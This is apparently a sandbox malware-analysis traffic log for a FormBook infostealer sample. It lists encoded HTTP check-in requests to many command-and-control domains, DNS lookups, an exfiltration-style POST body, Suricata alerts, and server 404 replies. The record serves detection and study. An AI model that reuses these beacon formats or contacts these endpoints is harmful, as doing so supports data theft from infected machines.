            Source: global trafficHTTP traffic detected: GET /ei85/?YXDT=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&ZH3=yf1H3v6h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.telwisey.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /aroo/?ZH3=yf1H3v6h&YXDT=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.sandranoll.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /tf44/?YXDT=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&ZH3=yf1H3v6h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.gipsytroya.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /mooq/?ZH3=yf1H3v6h&YXDT=6C5pq03gIUcCxycb2ojrc6UlpUueVjiCIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGnvkmbDl/kRMbgDKTG3Ttr251X/MxPUe8WZ8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.helpers-lion.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /lfkn/?YXDT=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&ZH3=yf1H3v6h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.dmtxwuatbz.ccConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.hprlz.cz
            Source: global trafficDNS traffic detected: DNS query: www.catherineviskadi.com
            Source: global trafficDNS traffic detected: DNS query: www.hatercoin.online
            Source: global trafficDNS traffic detected: DNS query: www.fourgrouw.cfd
            Source: global trafficDNS traffic detected: DNS query: www.bfiworkerscomp.com
            Source: global trafficDNS traffic detected: DNS query: www.tinmapco.com
            Source: global trafficDNS traffic detected: DNS query: www.xn--fhq1c541j0zr.com
            Source: global trafficDNS traffic detected: DNS query: www.xn--matfrmn-jxa4m.se
            Source: global trafficDNS traffic detected: DNS query: www.anuts.top
            Source: global trafficDNS traffic detected: DNS query: www.telwisey.info
            Source: global trafficDNS traffic detected: DNS query: www.sandranoll.com
            Source: global trafficDNS traffic detected: DNS query: www.gipsytroya.com
            Source: global trafficDNS traffic detected: DNS query: www.helpers-lion.online
            Source: global trafficDNS traffic detected: DNS query: www.dmtxwuatbz.cc
            Source: unknownHTTP traffic detected: POST /qe66/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.catherineviskadi.comOrigin: http://www.catherineviskadi.comCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 201Referer: http://www.catherineviskadi.com/qe66/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36Data Raw: 59 58 44 54 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 55 78 6c 46 66 58 56 4f 54 51 50 44 66 58 7a 61 2b 36 4f 5a 53 54 41 44 36 6b 79 56 41 65 71 65 51 3d 3d Data Ascii: YXDT=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 43.252.167.188:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49765 -> 213.145.228.16:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 217.160.0.106:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 194.9.94.85:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49738 -> 5.44.111.162:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49747 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49763 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49741 -> 217.160.0.106:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49759 -> 23.251.54.212:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49777 -> 104.21.45.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49753 -> 194.9.94.85:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 23.251.54.212:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 217.160.0.106:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49769 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49749 -> 43.252.167.188:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49767 -> 213.145.228.16:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49761 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 194.9.94.85:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 213.145.228.16:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49776 -> 104.21.45.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 213.145.228.16:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49774 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49773 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49775 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 217.160.0.106:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49757 -> 23.251.54.212:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49778 -> 104.21.45.56:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49771 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 43.252.167.188:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49751 -> 43.252.167.188:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49755 -> 194.9.94.85:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 23.251.54.212:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49779 -> 104.21.45.56:80
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 12 Aug 2024 03:13:46 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 12 Aug 2024 03:13:49 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 12 Aug 2024 03:13:51 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Mon, 12 Aug 2024 03:13:54 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 03:22:04 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 03:22:07 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 03:22:09 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 03:22:12 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD 